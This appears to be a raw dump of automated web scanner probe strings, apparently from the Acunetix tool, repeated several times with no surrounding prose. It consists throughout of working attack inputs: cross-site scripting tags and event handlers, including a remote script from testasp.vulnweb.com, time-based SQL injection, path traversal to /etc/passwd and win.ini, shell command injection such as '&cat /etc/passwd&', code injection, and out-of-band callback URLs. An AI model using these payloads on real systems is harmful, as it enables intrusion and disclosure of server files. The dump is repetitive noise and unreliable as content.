/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt >prompt(907543)</ScRiPt>

1

1

1

1<video><source onerror="javascript:prompt(907706)">

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(944196)"></g></svg>

1

1

response.write(9109655*9950145)

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

'+response.write(9109655*9950145)+'

1<div style=width:expression(prompt(964723))>

1

&cat /etc/passwd&

"+response.write(9109655*9950145)+"

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<iframe src='data:text/html

'&cat /etc/passwd&'

1

1

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1<body onload=prompt(951198)>

WEB-INF/web.xml

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

1

cat /etc/passwd

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(949642)>

WEB-INF\web.xml

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

-1

1

`cat /etc/passwd`

1<img src=xyz OnErRor=prompt(974130)>

${100286+99762}

../../../../../../../../../../etc/passwd.jpg

1

1

1

|cat /etc/passwd#

-1)

1

1<img/src=">" onerror=alert(948492)>

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1&n960891=v963520

'|'ld

-1))

1

1<ScRiPt%20>prompt(951267)</sCripT>

)

1some_inexistent_file_with_long_name%00.jpg

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

"|"ld

gg7TUfII'

!(()&&!|*|*|

1&lt

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

CGveCZpd')

^(#$!@#$)(()))******

\xf6<img acu onmouseover=prompt(946652) //\xf6>

'"()

'

1

'

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

1<input autofocus onfocus=prompt(991382)>

LCc96yJk'))

testasp.vulnweb.com

"

1

"

1

/etc/passwd

1

<a href='http://www.acunetix.com'>website security</a>

1

-1

||cat /etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

1

1

-1)

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

[url=http://www.acunetix.com]website security[/url]

&dir

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

http://hit8WWt56SyBd.bxss.me/

${@print(md5(acunetix_wvs_security_test))}\

1

'&dir&'

1_mpBRp <ScRiPt >prompt(986145)</ScRiPt>

-1))

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

acunetix_wvs_invalid_filename

"&dir&"

1

1

1

ANLOVfMp'

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

|dir

1

1

comments

1

1

0UcTSUG5')

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

comments

http://www.acunetix.tst

'|dir

'"

1

2OHYSjJL'))

1

1

file:///etc/passwd

<!--

comments/.

1'"()&%<ScRiPt >prompt(909207)</ScRiPt>

"|dir

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1

1

1

1

'"()&%<ScRiPt >prompt(908841)</ScRiPt>

WEB-INF/web.xml

1

1

1

1_939605

1

1

WEB-INF\web.xml

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

1

1

acu7106\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7106

1

../../../../../../../../../../windows/win.ini.jpg

1

acux5117\xc0\xbez1\xc0\xbcz2a\x90bcxuca5117

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt >prompt(992560)</ScRiPt>

1

................windowswin.ini

1

1<script>prompt(984715)</script>

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(986769)</ScRiPt>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?972964></ScRiPt>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt >prompt(993451)</ScRiPt>

1

1

1<video><source onerror="javascript:prompt(924083)">

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(908050)"></g></svg>

1

1

1

1<div style=width:expression(prompt(925522))>

response.write(9626397*9737261)

WEB-INF/web.xml

1

1

'+response.write(9626397*9737261)+'

1

1<iframe src='data:text/html

WEB-INF\web.xml

&cat /etc/passwd&

1

SomeCustomInjectedHeader:injected_by_wvs

1

"+response.write(9626397*9737261)+"

1

1

'&cat /etc/passwd&'

1

1<body onload=prompt(932623)>

1

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(961885)>

"&cat /etc/passwd&"

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

SomeCustomInjectedHeader:injected_by_wvs

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1<img src=xyz OnErRor=prompt(961571)>

cat /etc/passwd

1

1

1

../../../../../../../../../../etc/passwd.jpg

1

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1<img/src=">" onerror=alert(958883)>

1

1

`cat /etc/passwd`

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1

-1

1<ScRiPt%20>prompt(913518)</sCripT>

1&n984780=v901917

|cat /etc/passwd#

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

${100378+99042}

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1&lt

)

1

-1)

1

1some_inexistent_file_with_long_name%00.jpg

'|'ld

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

!(()&&!|*|*|

\xf6<img acu onmouseover=prompt(960851) //\xf6>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

"|"ld

-1))

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

testasp.vulnweb.com

'"()

1<input autofocus onfocus=prompt(942542)>

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

^(#$!@#$)(()))******

1

1

zi1FLwIC'

'

1

/etc/passwd

<a href='http://www.acunetix.com'>website security</a>

1

1

1

"

TRFFKIB1')

1

1

'

1

1

[url=http://www.acunetix.com]website security[/url]

1

acunetix_wvs_invalid_filename

1

"

yFHXhH56'))

${@print(md5(acunetix_wvs_security_test))}

1_FnRtd <ScRiPt >prompt(973706)</ScRiPt>

1

http://hitXj1NVtbUbd.bxss.me/

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

-1

${@print(md5(acunetix_wvs_security_test))}\

comments

||cat /etc/passwd

1

-1)

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

comments

&dir

1

1

-1))

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

http://www.acunetix.tst

1

1

comments/.

'&dir&'

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

'"

YKG1KRny'

1

1

1

1

1

"&dir&"

1

xL0nRAlH')

1'"()&%<ScRiPt >prompt(961855)</ScRiPt>

<!--

1

L2LEqNnK'))

1

1

|dir

1

1

1

file:///etc/passwd

'"()&%<ScRiPt >prompt(968147)</ScRiPt>

1

'|dir

1

1

1_962577

/\../\../\../\../\../\../\../etc/passwd

1

1

"|dir

WEB-INF/web.xml

1

1

WEB-INF\web.xml

1

1

1

../../../../../../../../../../windows/win.ini

acu3894\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3894

1

1

acux8447\xc0\xbez1\xc0\xbcz2a\x90bcxuca8447

1

../../../../../../../../../../boot.ini

1

1

1<ScRiPt >prompt(937867)</ScRiPt>

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1<script>prompt(958626)</script>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt >prompt(952471)</ScRiPt>

................windowswin.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?915050></ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(918189)</ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

response.write(9095473*9308849)

1<video><source onerror="javascript:prompt(911995)">

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

'+response.write(9095473*9308849)+'

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(915846)"></g></svg>

1

1

1

1<div style=width:expression(prompt(928052))>

"+response.write(9095473*9308849)+"

1

1

&cat /etc/passwd&

1

WEB-INF/web.xml

1<iframe src='data:text/html

SomeCustomInjectedHeader:injected_by_wvs

1

'&cat /etc/passwd&'

1

1

WEB-INF\web.xml

1<body onload=prompt(907005)>

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

1

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(903492)>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

cat /etc/passwd

1

1

1

1

1

1<img src=xyz OnErRor=prompt(929524)>

1

`cat /etc/passwd`

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

../../../../../../../../../../etc/passwd.jpg

1

1

1<img/src=">" onerror=alert(975532)>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

${99762+99063}

1&n967377=v976303

-1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

|cat /etc/passwd#

1

1

1

1some_inexistent_file_with_long_name%00.jpg

1

1<ScRiPt%20>prompt(996693)</sCripT>

1

-1)

'|'ld

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

)

-1))

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1&lt

'

!(()&&!|*|*|

"|"ld

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

\xf6<img acu onmouseover=prompt(923768) //\xf6>

'"()

fdONFfGG'

testasp.vulnweb.com

"

^(#$!@#$)(()))******

http://testasp.vulnweb.com/t/xss.html?%00.jpg

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1<input autofocus onfocus=prompt(963818)>

1

${@print(md5(acunetix_wvs_security_test))}

1

5WEuRF16')

1

/etc/passwd

1

1

<a href='http://www.acunetix.com'>website security</a>

1

'

1

${@print(md5(acunetix_wvs_security_test))}\

kskiBS8Y'))

1

1

http://hit0NyuUkzG8g.bxss.me/

"

1

1

[url=http://www.acunetix.com]website security[/url]

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

acunetix_wvs_invalid_filename

-1

1

||cat /etc/passwd

1

1

1

1_5rbr6 <ScRiPt >prompt(982872)</ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

comments

1

-1)

1

1

&dir

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

http://www.acunetix.tst

-1))

1

comments

'"

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

Ri6ROlaX'

1

'&dir&'

comments/.

1

1

1

<!--

1

1

"&dir&"

1

jfQxnFc9')

1'"()&%<ScRiPt >prompt(979435)</ScRiPt>

1

|dir

file:///etc/passwd

1

'"()&%<ScRiPt >prompt(901235)</ScRiPt>

V50dQWWz'))

1

1

1

1_954480

1

/\../\../\../\../\../\../\../etc/passwd

'|dir

1

1

WEB-INF/web.xml

"|dir

1

1

WEB-INF\web.xml

1

1

1

../../../../../../../../../../windows/win.ini

1

1

acu9959\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca9959

1

../../../../../../../../../../boot.ini

acux6595\xc0\xbez1\xc0\xbcz2a\x90bcxuca6595

1

1<ScRiPt >prompt(965322)</ScRiPt>

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

1<script>prompt(949102)</script>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1<ScRiPt >prompt(909345)</ScRiPt>

................windowswin.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?992270></ScRiPt>

1

1

1<ScRiPt >prompt(951975)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<video><source onerror="javascript:prompt(994686)">

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(996657)"></g></svg>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<div style=width:expression(prompt(941549))>

1

1<iframe src='data:text/html

1

WEB-INF/web.xml

1

1

1<body onload=prompt(923436)>

WEB-INF\web.xml

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(934849)>

1

1<img src=xyz OnErRor=prompt(969047)>

1

1

1

1<img/src=">" onerror=alert(917387)>

1

1<ScRiPt%20>prompt(913291)</sCripT>

1

1

1&lt

1

1

\xf6<img acu onmouseover=prompt(995601) //\xf6>

1

1

1<input autofocus onfocus=prompt(908677)>

1

1

<a href='http://www.acunetix.com'>website security</a>

1

[url=http://www.acunetix.com]website security[/url]

1

1_pdq5m <ScRiPt >prompt(928300)</ScRiPt>

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

response.write(9000221*9398138)

1

'+response.write(9000221*9398138)+'

&cat /etc/passwd&

"+response.write(9000221*9398138)+"

1

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

cat /etc/passwd

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

-1

`cat /etc/passwd`

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

|cat /etc/passwd#

-1)

${100477+99922}

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

../../../../../../../../../../etc/passwd.jpg

'|'ld

1some_inexistent_file_with_long_name%00.jpg

-1))

1

1

1&n972780=v958299

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

"|"ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

EnG8LLAw'

)

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

testasp.vulnweb.com

!(()&&!|*|*|

ru508nOK')

'"()

/../..//../..//../..//../..//../..//etc/passwd.jpg

'

bgmWULpt'))

1

^(#$!@#$)(()))******

'

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

"

-1

1

1

/etc/passwd

"

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

||cat /etc/passwd

-1)

${@print(md5(acunetix_wvs_security_test))}

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

http://hitbQeJP6Gczd.bxss.me/

1

1

&dir

-1))

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

'&dir&'

acunetix_wvs_invalid_filename

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

KtiAR0an'

1

http://www.acunetix.tst

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

comments

"&dir&"

NPuADynC')

1

'"

|dir

1'"()&%<ScRiPt >prompt(901210)</ScRiPt>

1

1

comments

<!--

a0AYM0gG'))

'"()&%<ScRiPt >prompt(901708)</ScRiPt>

'|dir

comments/.

1

file:///etc/passwd

"|dir

1

1

1_981255

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1

1

1

WEB-INF/web.xml

1

WEB-INF\web.xml

1

1

1

1

../../../../../../../../../../windows/win.ini

acu7499\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7499

1

1

1

../../../../../../../../../../boot.ini

acux2308\xc0\xbez1\xc0\xbcz2a\x90bcxuca2308

1

1<ScRiPt >prompt(962787)</ScRiPt>

1

../../../../../../../../../../windows/win.ini.jpg

1<script>prompt(931668)</script>

1

1<ScRiPt >prompt(946704)</ScRiPt>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?934537></ScRiPt>

1

................windowswin.ini

1<ScRiPt >prompt(917898)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<video><source onerror="javascript:prompt(981347)">

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(935118)"></g></svg>

1

1<div style=width:expression(prompt(949137))>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

response.write(9371130*9105295)

&cat /etc/passwd&

1<iframe src='data:text/html

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

'+response.write(9371130*9105295)+'

SomeCustomInjectedHeader:injected_by_wvs

1

1<body onload=prompt(913336)>

'&cat /etc/passwd&'

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(998420)>

"+response.write(9371130*9105295)+"

1

../../../../../../../../../../etc/passwd

WEB-INF/web.xml

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

1<img src=xyz OnErRor=prompt(997213)>

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF\web.xml

cat /etc/passwd

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1<img/src=">" onerror=alert(928930)>

1

1

1

`cat /etc/passwd`

1

1

../../../../../../../../../../etc/passwd.jpg

-1

1

1<ScRiPt%20>prompt(934337)</sCripT>

|cat /etc/passwd#

1

1

1

-1)

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1&lt

${100134+100344}

'|'ld

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1&n994512=v995486

1

-1))

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

\xf6<img acu onmouseover=prompt(944792) //\xf6>

1

1

1some_inexistent_file_with_long_name%00.jpg

"|"ld

1

J82OMGR3'

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<input autofocus onfocus=prompt(964772)>

)

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

9BWNJHj0')

!(()&&!|*|*|

http://testasp.vulnweb.com/t/xss.html?%00.jpg

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

<a href='http://www.acunetix.com'>website security</a>

1

1

'"()

VDXmExqp'))

'

testasp.vulnweb.com

'

^(#$!@#$)(()))******

1

/etc/passwd

[url=http://www.acunetix.com]website security[/url]

1

1

"

1

1

"

-1

1

1

${@print(md5(acunetix_wvs_security_test))}

acunetix_wvs_invalid_filename

1_tAj0B <ScRiPt >prompt(900314)</ScRiPt>

||cat /etc/passwd

1

1

1

-1)

http://hitBgduyj6nVa.bxss.me/

comments

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

1

&dir

1

-1))

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

comments

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

1

'&dir&'

g1kCw5ON'

1

1

1

comments/.

pGGN22Gm')

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

http://www.acunetix.tst

1

"&dir&"

1

1

1

1

'"

file:///etc/passwd

JynHXGhu'))

1

1

1

|dir

1

1'"()&%<ScRiPt >prompt(948090)</ScRiPt>

1

/\../\../\../\../\../\../\../etc/passwd

1

<!--

1

1

'|dir

1

'"()&%<ScRiPt >prompt(932557)</ScRiPt>

WEB-INF/web.xml

1

1

"|dir

1_934394

1

1

1

WEB-INF\web.xml

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

../../../../../../../../../../boot.ini

1

1

acu10985\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca10985

1

1

../../../../../../../../../../windows/win.ini.jpg

1

acux6421\xc0\xbez1\xc0\xbcz2a\x90bcxuca6421

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt >prompt(921292)</ScRiPt>

1

1

................windowswin.ini

1<script>prompt(965056)</script>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(917401)</ScRiPt>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?933725></ScRiPt>

1

response.write(9097458*9665212)

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt >prompt(906427)</ScRiPt>

1

&cat /etc/passwd&

'+response.write(9097458*9665212)+'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<video><source onerror="javascript:prompt(948452)">

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

"+response.write(9097458*9665212)+"

1

../../../../../../../../../../etc/passwd

1

"&cat /etc/passwd&"

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(925912)"></g></svg>

1

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

WEB-INF/web.xml

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1<div style=width:expression(prompt(903951))>

SomeCustomInjectedHeader:injected_by_wvs

1

cat /etc/passwd

../../../../../../../../../../etc/passwd.jpg

1

WEB-INF\web.xml

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

`cat /etc/passwd`

1<iframe src='data:text/html

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1

1

1

1

|cat /etc/passwd#

1

1<body onload=prompt(930547)>

${99204+99571}

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1)

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(946795)>

'|'ld

1

1

1

-1))

1&n926053=v986501

/../..//../..//../..//../..//../..//etc/passwd.jpg

1some_inexistent_file_with_long_name%00.jpg

1<img src=xyz OnErRor=prompt(963348)>

)

1

1

"|"ld

1

irdAt0BX'

1<img/src=">" onerror=alert(998491)>

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

!(()&&!|*|*|

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'"()

1

V7lkzMpg')

1

1<ScRiPt%20>prompt(900090)</sCripT>

/etc/passwd

1

1

testasp.vulnweb.com

^(#$!@#$)(()))******

'

8rk5zSvo'))

1&lt

1

'

1

1

"

1

1

-1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

"

\xf6<img acu onmouseover=prompt(940907) //\xf6>

1

-1)

${@print(md5(acunetix_wvs_security_test))}

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

||cat /etc/passwd

1<input autofocus onfocus=prompt(961579)>

acunetix_wvs_invalid_filename

1

1

-1))

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}\

1

&dir

http://hitsFzc1gXVvi.bxss.me/

WFjXcbzb'

1

<a href='http://www.acunetix.com'>website security</a>

comments

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

'&dir&'

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

[url=http://www.acunetix.com]website security[/url]

tuw9LVon')

1

1

1

"&dir&"

1

1

1

1_QcuEh <ScRiPt >prompt(976027)</ScRiPt>

comments/.

G7YxwzFm'))

|dir

http://www.acunetix.tst

file:///etc/passwd

1

1

1

1

'"

1

1

/\../\../\../\../\../\../\../etc/passwd

1

'|dir

1'"()&%<ScRiPt >prompt(928136)</ScRiPt>

1

1

1

<!--

1

WEB-INF/web.xml

"|dir

'"()&%<ScRiPt >prompt(943561)</ScRiPt>

1

1

1

WEB-INF\web.xml

1

1

1

1

1_943748

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

../../../../../../../../../../boot.ini

1

1

1

1

acu7798\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7798

../../../../../../../../../../windows/win.ini.jpg

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

